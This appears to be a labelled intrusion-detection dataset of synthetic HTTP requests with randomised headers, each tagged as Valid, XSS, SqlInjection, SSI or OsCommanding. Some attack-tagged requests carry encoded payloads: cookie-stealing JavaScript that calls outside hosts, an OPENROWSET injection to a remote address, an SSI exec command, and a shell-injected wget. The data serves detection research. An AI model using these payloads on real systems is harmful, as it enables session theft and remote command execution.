GET /m5k9tSPtzmocha/dDiged7Piitn/fahotoaezRo/u3wdtheiiemvcsemI/tret/kDppgD/oII-ouu@BOlH-/n2J07xterm/el9E0otarcealwntobHs/ez.swf? HTTP/1.0
Host: 172.159.152.88:65260
Connection: keep-alive
Accept: */*
Accept-Charset: shift_jis;q=0.7, iso-2022-kr, cp-936
Accept-Encoding: gzip;q=0.9, compress;q=0.1
Accept-Language: *;q=0.4
Cache-Control: max-age=159
Client-ip: 124.143.227.1
Cookie: gr=tyana;xeeDA=s)
Cookie2: $Version="1"
Date: Fri, 26 Sep 08 22:45:05 CET
ETag: "x-_r1iPC05a1VgOq1"
Expect: aceiilri
From: aopeat@lwiRaar.be
If-Modified-Since: Fri, 29 Oct 04 02:54:18 UTC
If-Unmodified-Since: Sun, 15 Jan 06 13:01:32 GMT
If-Match: "mhjlhhIqIOmTtzwlMK"
If-None-Match: "DoXn6FKwq4K0YK6tP"
If-Range: *
Max-Forwards: 9146
MIME-Version: 5.3
Pragma: ia='vh'
Proxy-Authorization: NTLM dDdlaUF0ZXVvM2hvZ29ubXJhYW90TXFvbjR1T3VydHNpVGlOazNBcmRwT2E=
Authorization: Digest nc=4FAFD0dc
Range: -669045
Referer: http://s2otygj.cz/stetrsn/hi5iokgo.gif
TE: chunked,trailers,chunked
Trailer: Authorization
User-Agent: Mozilla/8.3 (X11; U; Linux i586 0.5; de-ue; rv:0.5.2) Gecko/08945317
UA-CPU: StrongARM
UA-Disp: 4060,2972,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 019x565
Via: 0.6 24.165.2.240
Transfer-Encoding: deflate
Upgrade: dee/6.6, qx6San/1.4, EaHU/5.9, nHtl/9.9, narr/5.4
Warning: 484 241.93.184.248:77 "o0ohbhcf" "Fri, 27 Apr 07 20:20:14 UTC"
X-Forwarded-For: 150.165.127.46
X-Serial-Number: 2424153746137739
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13864
Start - Id: 47652
class: XSS
GET /e1h2ttrgmvoohh/n7D/tRLwRfr_0RB/p4o_o@jki/nuFrcHOyorTevalXp/sJdEIOUIbBUceuq9nC3/sv@Ri.cgi?qom5xp=%3Ca+href%3D%22+javas%26%2399%3Bript%26%2335%3B%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.al.com%2Fcgi-bin%2Fis.cgi%27%2Bdocument.cookie%29%3B%5D%22+++%3E&0ijnButIart=ei HTTP/1.1
Host: 218.114.167.227
Connection: close
Accept: */*;q=0.5
Accept-Charset: iso-2022-kr;q=0.9, x-mac-icelandic, iso-8859-15;q=0.8, x-mac-korean, iso-8859-3;q=0.5
Accept-Encoding: *
Accept-Language: k-dnF, lqhel-taHwmbwy;q=0.2
Cache-Control: only-if-cached
Client-ip: 168.210.69.11
Cookie: niEg4garrmtihf=hL3z7r;cy8Tfhl=iepunrgenc;kOoHrfutD=tZ3QP;bcenesRq=692180;xRAdoAEh=1w1tm;L6GkanE=8801064
Cookie2: $Version="8"
Date: Wed, 28 Dec 05 09:54:44 GMT
ETag: "GPf6DVX.K2gbV@luK"
Expect: gOld=rlutt
From: tdjaSrwt@arqsc.uk
If-Modified-Since: Mon, 02 Feb 04 24:26:39 CET
If-Unmodified-Since: Mon, 15 Aug 05 17:20:20 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 651
MIME-Version: 7.7
Pragma: e=dteai
Proxy-Authorization: NTLM Y1RkYnJleXZkdWNtRWloeWRia2hYc29Ob3RnY21KdHg2MXdwZXpFc3R1Y3YyZQ==
Authorization: Basic ZUl0Mzppb2F0c2xP
Range: 51-,059585-
Referer: /tesdbo/r3zi/cmena/ncni/ggahpa.tiff
TE: gzip;q=0.3,chunked;q=0.1,gzip
Trailer: Via
User-Agent: Mozilla/7.2 (X11; U; Linux i386 6.7; su-e5; rv:0.7.5) Gecko/11440245
UA-CPU: x86
UA-Disp: 434,760,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 635x1311
Via: FTP/4.7 www.otsd6.shtml, 6.5 www.0ajg.jpg, 0.9 206.142.107.158
Transfer-Encoding: gzip
Upgrade: lica5r/6.9
Warning: 566 31.172.243.106 "c7nne1icSkIuSipo" "Sat, 17 Jan 04 22:31:55 GMT"
X-Forwarded-For: 253.174.138.228
X-Serial-Number: 6943669939
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47652
Start - Id: 13134
class: Valid
GET /J_Mw6NbYtG/oehI7EnrB7PgVo/@T.Fnv8RT.css?0efI=hqioewp-ewy-roqxm%40objecter&f5bOqDH7GFZ=9&nofo8shxyueyxb=vD2zomjS71t4++08&srja9fphfglAh=s9aseir&ni2hzte=269155288&zstaa=1369737117&PhEXr=tea7&a5t=w&ehdeijh=r45m&refteaaic4ncd=0&lttroanub3duya=eJuquTsrEM&Aj_imgS-I9Fm=lTX&irgsxm3V=0tgbfzajs3o&NF0QMhJ1Ht=343311 HTTP/1.0
Host: www.onyoGndedj.it
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: iso-8859-7;q=0.5, x-mac-turkish, iso-8859-9, iso-8859-4, iso-10646-ucs-2
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 240.0.183.176
Cookie: tuyDYUhcO1N=8324;eonencteie=nehey0oehirrn
Cookie2: $Version="3"
Date: Sat, 02 Jun 07 15:48:16 CET
ETag: "EZnUQu-V3qHKvOtWYS"
Expect: e2sht=aoay;rsey6i=paia
From: rBs84eg@im6v.st
If-Modified-Since: Mon, 02 Aug 04 16:17:55 GMT
If-Unmodified-Since: Fri, 06 Jul 07 14:01:18 GMT
If-Match: "KH-4_Ys6CVB@JndIhG"
If-None-Match: "ZV6Im912Bdmm9CcdazWa"
If-Range: *
Max-Forwards: 8
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: NTLM dWdyb2xkYWZuaW5oaGNzdGNueHlpMnRUbGI2ZWJlanRlMW80YW9iaXJvYWN0ZGVl
Authorization: Digest nc=564fa97e
Range: 96-
Referer: /Dynrcir.shtml
TE: trailers
Trailer: Warning
User-Agent: h@.JOVLA9 http://www.c2fonN.gov
UA-CPU: Sparc
UA-Disp: 806,0738,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 9714x547
Via: HTTP/3.6 83.100.196.193:2, 7.9 www.xiwts.tiff, HTTP/9.1 www.9rTdsscb.js
Transfer-Encoding: deflate
Upgrade: ieri/8.8, fihXea/0.2, pcuC/3.5
Warning: 988 www.pasceto.js "hpmirfwelzcei" 
X-Forwarded-For: 141.250.177.130
X-Serial-Number: 193112080
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13134
Start - Id: 48092
class: XSS
GET /rinntmevtisnssr2ht/emeDthsehtit.asp?TVXRboot.inig=siheeo3nq+%2B%25rA8&2AJbody_=9031&NnsneoeZevitrko=32276870&pprtsoaa=280779935&woegFnaehpmtpm=iy1ileraccepte&0a4tuf=sZsqT3qsM.4&ero0Z=mfstyahiE&c@dGXZ=9XdN&6h1xatuarnsne=%3Clink+rel++++%3D+++%22++++stylesheet++%22++href+++%3D++++%22+++++javascript%3A++++%5Bwindow.open%28%27http%3A%2F%2F114.165.131.91%2Fre.pl%27%2Bdocument.cookie%29%3B%5D++%22++%3E&8h9=802822&yecfspVaghoUt=24009429&nolaeeeu=4&enwicowr=29&kenn9odd=6650&scsm8t=bdoPv HTTP/1.0
Host: 222.50.154.202:11728
Connection: keep-alive
Accept: audio/x-wav
Accept-Charset: x-mac-arabic, euc-jp, shift_jis, cp-932, windows-1253
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 206.209.94.55
Cookie: s.13vP9X=9809
Cookie2: $Version="484"
Date: Sun, 04 Dec 05 18:19:02 CET
ETag: W/"f2Ef.UQP5@VK81BRTV"
Expect: 100-continue
From: pr43lq@7remye.cz
If-Modified-Since: Sun, 22 Oct 06 10:09:38 GMT
If-Unmodified-Since: Tue, 15 Nov 05 13:40:12 CET
If-Match: *
If-None-Match: "GcE-g2tQMoCO8S4zzc4N"
If-Range: Tue, 26 Jan 10 12:22:26 UTC
Max-Forwards: 4797
MIME-Version: 2.8
Pragma: 8eei8s=PEcrap
Proxy-Authorization: NTLM NWRlb1JzZXRwOFppblVlMG5kaGNlZWlRb1hhNG1xZW5tYmg4N0x0dzc=
Authorization: Digest algorithm=MD5
Range: -179295,540225-63
Referer: http://huth.st/acrt2tEl/igdt.dll
TE: trailers,trailers
Trailer: Max-Forwards
User-Agent: ooIrvheuh (ilQUikuQZ; daHnXxj; neCq0pf20G; w6G5TRF)
UA-CPU: Sparc
UA-Disp: 367,260,16
UA-OS: Win95
UA-Pixels: 6001x2247
Via: HTTP/0.9 97.240.1.246, 0.6 67.131.86.140, njhoOo/4.4 173.241.197.147:504
Transfer-Encoding: deflate
Upgrade: latA/6.2, lyernh/8.8, vU0s/9.0, esnis/7.5
Warning: 356 www.tzeinr.css "til8sinolr" 
X-Forwarded-For: 69.186.228.89
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48092
Start - Id: 3130
class: Valid
GET /99.cfm? HTTP/1.1
Host: 116.190.62.62:80
Connection: close
Accept: audio/*, image/jpeg, audio/*;q=0.1
Accept-Charset: *;q=0.6
Accept-Encoding: identity, compress;q=0.9, identity;q=0.7, deflate;q=0.0, identity;q=0.4
Accept-Language: ezn-hdplO;q=0.2
Cache-Control: no-cache
Client-ip: 98.170.128.115
Cookie: 7Oninotiniartce=fPZSaK;okin=2580214510;xgrrJH=tltehslAwlit8eiaT;Yi=3x|e-e4zusrsirnEusnRts;7_ET=of~y5'adminlst
Cookie2: $Version="114"
Date: Sun, 15 Feb 09 05:28:06 UTC
ETag: W/"IFXJH7fpY2ax3@6hp"
Expect: rrtBrq=0w0Eoeo
From: eead@01e8oq1.gov
If-Modified-Since: Fri, 02 Feb 07 12:25:02 UTC
If-Unmodified-Since: Thu, 29 May 08 02:28:36 CET
If-Match: "rdT3btif2dxfJ2ImA"
If-None-Match: *
If-Range: "62kVHxI-e6QvdatTvJI6"
Max-Forwards: 98
MIME-Version: 8.6
Pragma: e='di6ta'
Proxy-Authorization: Basic OGlhbnVyb2U6ZGZqb2VyZWE=
Authorization: Basic bHVvaTpsYTFjbg==
Range: -6106,0309-,1-
Referer: /iafSc/nuihsei1/rdneetwK.cfm
TE: deflate;q=0.4,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: olubst9ysywcA
UA-CPU: PowerPC
UA-Disp: 245,4881,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 5219x775
Via: 5.4 www.sa0kdUe.gif:36, HAwr/6.3 52.24.97.229, HTTP/0.4 www.n4pSal.html
Transfer-Encoding: deflate
Upgrade: qtipy/8.0, crocn/6.7, lns/3.2, psbneW/8.3
Warning: 446 www.fikne.html "nqbsbldmuEl1E71nq1" 
X-Forwarded-For: 54.64.220.207
X-Serial-Number: 545829621
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3130
Start - Id: 42501
class: SqlInjection
GET /ey7R0@Z1BV9y.n/2Zo/3includeo99-/0yttnh/BwJrf1ZJuRT/cXP96rP2/5lCI4JDj8OLtr@4TLVIZ/ieIOeod4eoybn6xeitmL/nehoiyeurbogie/heneace8lew/j-JFRCkQo-.js?vxadnun0n=t%3Dee%3EneAe%29hh%7Clrn2s&iehtTYtn1coxi=a3FZ.WgoTaSR&odxwp=iloknPyihcNsbdy4we&oiie5u8=Ith%3FoorciteaTAc&eArtmnghsreuzn=1&gea=2271561&ilsGdqdnG=uinsert+&0ltwk=%3B++select++++*++++from+++++OPENROWSET%28%27SQLoledb%27%2C%27uid%3Dnisr%3Bpwd%3DfEen%3BNetwork%3DDBMSSOCN%3BAddress%3D233.188.72.227%2C93168%3B%27%2C%27select+++*+from+ssatOrq%27++%29 HTTP/1.0
Host: 54.92.201.48
Connection: D6a6bhRo
Accept: video/*
Accept-Charset: x-mac-hebrew
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 59.62.46.157
Cookie: om2bon2eaerebn=l;eroa8rgterhheo=asdhETiomOshv;wnlraaAfsEnetnh=e@5lB.N@7e;oeebhd=6434;IgVh6S5openB6xh=ire0d
Cookie2: $Version="059"
Date: Tue, 06 May 08 04:29:16 GMT
ETag: W/"R_iyxOFyTu-4qGue"
Expect: eb8e
From: sheo@RafNi.uk
If-Modified-Since: Wed, 22 Dec 04 20:34:49 CET
If-Unmodified-Since: Mon, 24 Mar 08 23:46:09 CET
If-Match: "L2Vij3R8ukgc0zgU"
If-None-Match: *
If-Range: Tue, 04 Jul 06 22:26:12 CET
Max-Forwards: 546
MIME-Version: 9.9
Pragma: deiu=tc8aohw
Proxy-Authorization: Ebra8 aiKrw2u=2h7Ged
Authorization: Digest uri=http://noqluar.com/ntodeig/dth6.jpg
Range: 16802-
Referer: http://ehrE.uk/eiystu.asmx
TE: gzip;q=0.7,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/2.7 (Machintosh; U; Mac OS X 2.6; hi-Mi; rv:5.9.6) Gecko/59839581
UA-CPU: x86
UA-Disp: 3013,748,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 733x829
Via: kist/5.9 www.tetncEa.gif
Transfer-Encoding: compress
Upgrade: ihs/6.9, sw1v/7.0, tkg/8.2, rtlu/7.8, heTt/3.6
Warning: 504 127.15.72.187:71097 "tehsu6o03" "Sat, 20 Aug 05 24:15:38 GMT"
X-Forwarded-For: 10.31.99.179
X-Serial-Number: 171208894897748
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42501
Start - Id: 33565
class: Valid
POST /o2d/hXA-K1kxN8/LK2gfJ@GJjl/asaeae/awo66zilIo9I6dezhhS0/ySd21NhSpqIITAh/hLD0NkrjW/hJ-.RLkw99qo.htm? HTTP/1.0
Content-Length: 17
Content-Language: inAmw,lmeie
Content-Encoding: identity
Content-Location: /0ntn/eio8s/4iec/lonxoi.mdb
Content-MD5: YWFlZWluMXNlZmQ5bGNjYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 30 Oct 05 18:03:09 GMT
Last-Modified: Sat, 24 Sep 05 24:48:28 UTC
Host: www.mtethrmh.it
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 120.138.44.232
Cookie: Liwteoto5ilhrmt=uivhndeze;irrnieiidd=Ote r;a2oi03=jait;x6btD81G8MX=lastyle3xterm-urn?eme6a
Cookie2: $Version="77"
Date: Fri, 01 Jan 10 10:46:31 CET
ETag: W/"bQg_RxXXi8-QslJF"
Expect: 100-continue
From: nndz@n7ls.fr
If-Modified-Since: Wed, 24 Jun 09 16:10:00 UTC
If-Unmodified-Since: Tue, 05 Oct 04 06:42:49 GMT
If-Match: "ttX5zkb3aKCs46Syor2"
If-None-Match: *
If-Range: Tue, 06 May 08 05:06:33 CET
Max-Forwards: 9
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: NTLM aXJlbHBlNHRsazdsbGZpbmh0cmVpZXNzdXlnbGVrN2lpbjZuc2ZlMW90ZXJy
Authorization: Basic empydGE6VG9jYWFYb3U=
Range: -65580,016-
Referer: /fhusp/sfie3jvh/gcCu2i/ilaAemon/n4lsn.rar
TE: chunked;q=0.2,trailers
Trailer: Transfer-Encoding
User-Agent: d1aaseehsr (ezBFQey9N; sKL6GCcT.V; sQ84uh; 3MOWJP; e6KPU7ZK-)
UA-CPU: PowerPC
UA-Disp: 4987,665,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 417x756
Via: 2.7 www.cesd.gif, 7.3 www.adtOtxc.jpg, 8.7 www.eete.gif
Transfer-Encoding: gzip
Upgrade: mfbtIA/2.9, ou7og/9.7, ous/6.4, laf2aw/8.5
Warning: 904 254.251.47.53 "9tyslbOtj" "Fri, 25 Nov 05 09:55:02 UTC"
X-Forwarded-For: 188.249.94.253
X-Serial-Number: 634432406284219
----: ----------------------------------
~~~~~: ~~~~~~~~~~~

ailt1Is=569680192

End - Id: 33565
Start - Id: 33995
class: Valid
POST /tL.-ba01ke/2urnlidorie/uieUlNPYvC.BDCTry93/hand0aWM7AM/bR-E/lie/childi.asmx? HTTP/1.0
Content-Length: 66
Content-Language: lewt,Clec9,tad
Content-Encoding: compress
Content-Location: http://www.oreeoo9.uk/l9tiotry/nieeibm.zip
Content-MD5: YmE5aXA5bGV0OG93cmxycg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 13 May 04 09:53:41 UTC
Last-Modified: Wed, 17 Dec 08 10:18:49 CET
Host: 117.236.18.70
Connection: close
Accept: */*;q=0.8
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 39.53.38.119
Cookie: pwLcFn4ueto=itmtnmlinmeWLc
Cookie2: $Version="973"
Date: Sun, 07 Nov 04 20:35:31 CET
ETag: "6UWnvfsGBOmvxwT1-"
Expect: Cisk
From: sadait@weoM.be
If-Modified-Since: Thu, 05 Feb 04 03:50:33 CET
If-Unmodified-Since: Sat, 13 Sep 08 15:57:13 UTC
If-Match: *
If-None-Match: "qWYE5Tqs2Enduuyc4lLh"
If-Range: Wed, 06 Dec 06 01:39:13 CET
Max-Forwards: 4
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Basic b21lZm5hYXU6dThjaWE=
Authorization: Basic Y2hvcm9udTpsdHR0WA==
Range: -4
Referer: /AsAe/Aiu22/dm9mr5/iHsle2.pl
TE: chunked;q=0.0
Trailer: Expect
User-Agent: Mozilla/6.0 (X11; U; Linux i386 5.1; kc-om; rv:7.9.8) Gecko/40940909
UA-CPU: Sparc
UA-Disp: 2741,322,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 354x173
Via: HTTP/4.3 71.42.156.102, HTTP/1.4 www.40ooh.gif:86
Transfer-Encoding: deflate
Upgrade: oee/5.6, rhoga/6.1, ehtjsr/7.2, qeweO/5.7
Warning: 940 162.211.201.47:6845 "rajautsi" "Thu, 26 Nov 09 04:54:54 UTC"
X-Forwarded-For: 12.168.45.157
X-Serial-Number: 5360283
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

T40=als~&tafohhi=uLuYcVa&fIefih=58&2v=sH&rprtstyalb4rc=481478123

End - Id: 33995
Start - Id: 23851
class: Valid
GET /1k0/aQ2MZTzQ0bGs6.jtHt/BVc/t9PxK/rQtlH_I.shtml?eyhi=ynila&aoxnkesw=4&Tpqtr7ihzrfuk=cvmt5uu&elnreeam=mntnox3o&aeosyt9vNte2=ijwieiec&kS_5Xp=neO&ooipetdhM4=se HTTP/1.1
Host: www.leirfa.it
Connection: close
Accept: audio/*;q=0.4, application/rtf, application/rtf;q=0.0
Accept-Charset: *
Accept-Encoding: identity;q=0.1, deflate, compress;q=0.4, compress
Accept-Language: 8ytgb6-mkg
Cache-Control: max-age=75261
Client-ip: 158.198.144.188
Cookie: 7ulsarG5=6
Cookie2: $Version="78"
Date: Mon, 20 Jun 05 17:26:40 CET
ETag: "TuRdTw-hBPfWNyzx"
Expect: 100-continue
From: rtiCoo@tdeem2s.cz
If-Modified-Since: Thu, 16 Feb 06 12:17:53 GMT
If-Unmodified-Since: Wed, 07 Dec 05 08:52:34 GMT
If-Match: *
If-None-Match: "VAit6yHuCEyA-iU"
If-Range: *
Max-Forwards: 4152
MIME-Version: 2.3
Pragma: oicdtGt='feIeohd'
Proxy-Authorization: Digest opaque="Tany"
Authorization: Digest cnonce="w4n7b"
Range: 120-9
Referer: http://3ohhOmgr.ch/aiaigun/EwEEtsxi/remy.png
TE: trailers,deflate,gzip;q=0.8
Trailer: Upgrade
User-Agent: stiod/0.6.3.1
UA-CPU: PowerPC
UA-Disp: 579,7280,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 1738x3451
Via: 3.2 www.etoSttnS.shtml, HTTP/0.3 www.uk2ySs0.png, FTP/0.8 226.187.125.28
Transfer-Encoding: euat
Upgrade: tmu3/0.7
Warning: 334 www.dlwn9r.html "poruwu1jl" 
X-Forwarded-For: 223.106.91.27
X-Serial-Number: 119652447524751
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23851
Start - Id: 40299
class: SSI
GET /lrasd3dyr/heccrl/rBjRXPP5g/wWT6XDAwqFs7Gz3/eHof.4g/snm9hEswduoeaa/rZx.h9IAy50Qzx1/idznCsdwee.swf?siesRkbo5e=%3C%21--++++%23exec+cmd%3D%22c%3A%5Cprogra%7E1%5C8a%5Cc70n%5Cydrh.exe+++d%3A%5Cnn7SA%5Cwww.teet.org%5Cit5atyc%5Cdatabase.mdb+%2Fx+++++exporttofoxpro%22--%3E&naec9sdu3aheln=drz3&eiy=%5D%5C&.YKWvq=95574868 HTTP/1.1
Host: www.1pen.org
Connection: pnianiu
Accept: */*;q=0.5
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: eddaTo-eioen4n;q=0.6, aeLOT-a;q=0.4
Cache-Control: min-fresh=699
Client-ip: 51.44.173.24
Cookie: leeisrU4a=bMw8-5r1u2_;adfdhv6M=~ser@;psst=dyJ2wiIA;hcdheAHneqtNzi5=teglo3f4i;thp9th=nebin4boot.inifZAkm'j;rnsbva=hhl2sgrzexeoki
Cookie2: $Version="373"
Date: Wed, 02 Jun 04 22:27:20 UTC
ETag: W/"cZahXkYy1L59OAb"
Expect: 100-continue
From: oyte@woinhmes.com
If-Modified-Since: Sat, 06 Nov 04 03:25:17 UTC
If-Unmodified-Since: Sun, 12 Nov 06 11:38:36 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 22 Dec 05 07:20:42 CET
Max-Forwards: 4606
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: oeos goaweqW=tqMehbrx
Authorization: Digest response="3f31C46cFe8c67aF5E5a5aF39FC6de6F"
Range: 5046-3165,-1034
Referer: http://aGaenf9.gov/e8mbe/emG2/zoou/elmeaIt.bin
TE: deflate;q=0.5,chunked;q=0.9,trailers
Trailer: If-None-Match
User-Agent: wueu/2.9
UA-CPU: MIPS
UA-Disp: 996,846,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 2184x777
Via: 0.3 78.171.60.206
Transfer-Encoding: ramO
Upgrade: hiCkrp/2.9, tclcr/7.7, ntp5/3.3, her/1.8
Warning: 285 39.249.111.46 "orhrou3Uo8amdcneinui" "Sun, 02 Sep 07 09:37:14 CET"
X-Forwarded-For: 154.142.43.224
X-Serial-Number: 475557970524
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40299
Start - Id: 31280
class: Valid
GET /tMGUXBwzD7nuLza/WN7_QmochaxHhttps6j7/dgHUbFToxEK.cfm?asndtte=m+h%25g&hoarse=btaa+to&v2gysdpntncrm25=%2FOreTta4l9t&lbsh=%2Beourco+gwrutN7 HTTP/1.1
Host: 147.145.239.40:80
Connection: keep-alive
Accept: application/postscript
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: max-stale=80728
Client-ip: 94.93.194.223
Cookie: cGbbl36w=3195;u8trlndnwHUsset=oOmd;zm6betweenJ=1263163965;3n3hr0htuoaat=d4ooa)ce-~?~teinclude/oe
Cookie2: $Version="2"
Date: Wed, 21 Oct 09 11:35:07 UTC
ETag: "Gscpz.g0HmvES8SSd"
Expect: 100-continue
From: Jaodie@trvhtsHeY.ch
If-Modified-Since: Fri, 05 Mar 04 16:56:01 CET
If-Unmodified-Since: Sun, 17 Apr 05 07:41:36 GMT
If-Match: *
If-None-Match: "opapyH8J7hfqJmJ"
If-Range: Mon, 12 Mar 07 11:10:58 GMT
Max-Forwards: 5322
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Digest response="57BDdf1DBA67734eB88F9d60DBd482BC"
Authorization: Digest nonce
Range: -388719
Referer: http://www.oames.com/ygj7ueb/wenw.jpg
TE: gzip;q=0.0
Trailer: Referer
User-Agent: 6eiybbozbd (r4meKNV3)
UA-CPU: 68000
UA-Disp: 5325,2370,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 3795x126
Via: FTP/5.8 www.ndAct.css, 2.3 www.iye1nmi6.js:75457
Transfer-Encoding: compress
Upgrade: aAscr/3.2, igtw/7.1, csA/1.1
Warning: 003 104.186.55.32:84616 "cIIietnrr" "Tue, 16 Dec 08 21:07:19 GMT"
X-Forwarded-For: 45.216.230.89
X-Serial-Number: 2832995137
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31280
Start - Id: 11
class: Valid
GET /nreuoo8anaOtsyweznsa/iaTJBuGw/5ete7nt.html? HTTP/1.0
Host: 38.85.38.97:80
Connection: keep-alive
Accept: application/zip;q=0.6
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: Za-5dOiioi;q=0.3, oe-h, wrgoLrA-Ydyutlel
Cache-Control: no-store
Client-ip: 198.201.173.41
Cookie: oenGtle0=8588;enlaapbsdsAJeet=auigutd;nRyo1Jctelnetx56Y=adt
Cookie2: $Version="52"
Date: Fri, 23 Nov 07 22:59:51 GMT
ETag: "xKvhZlfHaGkC_f_WLhN"
Expect: 100-continue
From: 4atoe@ehNulvLa.net
If-Modified-Since: Sun, 07 Nov 04 12:56:14 UTC
If-Unmodified-Since: Tue, 19 Oct 04 06:30:05 CET
If-Match: "Ea4h_iuEGBpuhik0E"
If-None-Match: "LpnoLelb7twMFrynvu"
If-Range: Mon, 17 May 04 05:39:49 GMT
Max-Forwards: 505
MIME-Version: 6.7
Pragma: no-cache
Authorization: NTLM MHRtRGV0ZWF2bFRhZXJlRXRkZXNubmhzaXRtaG1kdGVxOHNlc2E=
Range: -8,-6
Referer: /elnlt.jsp
TE: trailers
Trailer: From
User-Agent: Mozilla/1.3 (compatible; MSIE 8.1; SunOS sun4u; dziknqi; tn8tndeaz)
UA-CPU: MIPS
UA-OS: Mac OS X
UA-Color: color8
Via: HTTP/8.1 172.254.186.232:6108, FTP/2.6 222.98.171.160:50
Transfer-Encoding: deflate
Warning: 092 www.bnp6yotc.jpg "It5ru0hZb2OxuMoerlh" "Fri, 11 Dec 09 19:58:51 GMT"
X-Forwarded-For: 20.155.227.227
X-Serial-Number: 5317711684271315
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11
Start - Id: 43399
class: OsCommanding
GET /5a/CWFKCTG4htaccesjUgnp/fvY/y2U4FuJ/child-Nzservices2K3passwdL/uQea0euld5iT9tta/tXvafK2hT_lQZpp1nfhL/satmuae3naeh2iTsreek/KPYDjUsw-/p7kmceOyW/vGiJodZAZFnuEl.htm?rondtysartmoi=%22++%3B++++%2Fusr%2Fbin%2Fwget+++++www.tatr.com%2Fet%3B&ils=log%2FpuueN1Tadocument&rtthur85sma=6418&zqhalt7ciskntn=253 HTTP/1.0
Host: 215.19.205.177:80
Connection: rEigrmRd
Accept: */*
Accept-Charset: x-mac-arabic, iso-8859-8;q=0.3
Accept-Encoding: gzip;q=0.3, identity;q=0.3
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 143.76.65.70
Cookie: pollnnaym=14772388;ciaan3mer=utnr p;cbv=88843;seuemwdeo=aG0;tlwoiekhie=4707
Cookie2: $Version="5"
Date: Mon, 26 Dec 05 07:08:36 CET
ETag: W/"FBRRehdBHitCX2E"
Expect: r7zlrt=b3tw9ls;aeiop=hnEr
From: su7olsim@shSdnne.cz
If-Modified-Since: Wed, 13 Jun 07 17:06:51 CET
If-Unmodified-Since: Sun, 15 Nov 09 08:33:03 UTC
If-Match: "d30xvdIrjFZxaS-v2WxE"
If-None-Match: "sA9an9x51rnIZvRAc"
If-Range: *
Max-Forwards: 1815
MIME-Version: 6.9
Pragma: tton5eal='rc3enq'
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic MXdIaTpJaHR6eWFzMQ==
Range: -4315,8885-439,063-
Referer: http://e64Kt.ch/m2odIcts/wTfysnad.js
TE: trailers,gzip;q=0.3
Trailer: If-Range
User-Agent: 3hnr8z8tmcuraapte
UA-CPU: StrongARM
UA-Disp: 3207,5717,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 9788x122
Via: HTTP/4.3 165.255.189.209, FTP/0.6 www.Kfnr.html:61756
Transfer-Encoding: identity
Upgrade: zos/3.8, LrxEi/5.1
Warning: 667 www.eekudeq.shtml "ep6tpihnare" 
X-Forwarded-For: 207.33.218.68
X-Serial-Number: 64752723331418038
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43399
Start - Id: 11621
class: Valid
GET /smteu2fnpnm.shtml?uaOrtiiiO7evrm=+te0tudnsr%402E&fsto=7a%3Ci&shtaccesyb0aoOY=or&oUDMd=419&iosOaiaoEae=oiciwEG3h.&KjJchildcmd%u=llochildsock_stream&eutIYmb5Ihrma=ehrvSn+dTRwetci&i8a=a9%2F&pu9CsIp=dTkltBY&aeaI9rA52=l9uu&dishitnidTvz=21&og=sHl6isqz2udSciump&ssyO8=na&heart1l1=toIe HTTP/1.1
Host: www.etmIhsinf.st
Connection: close
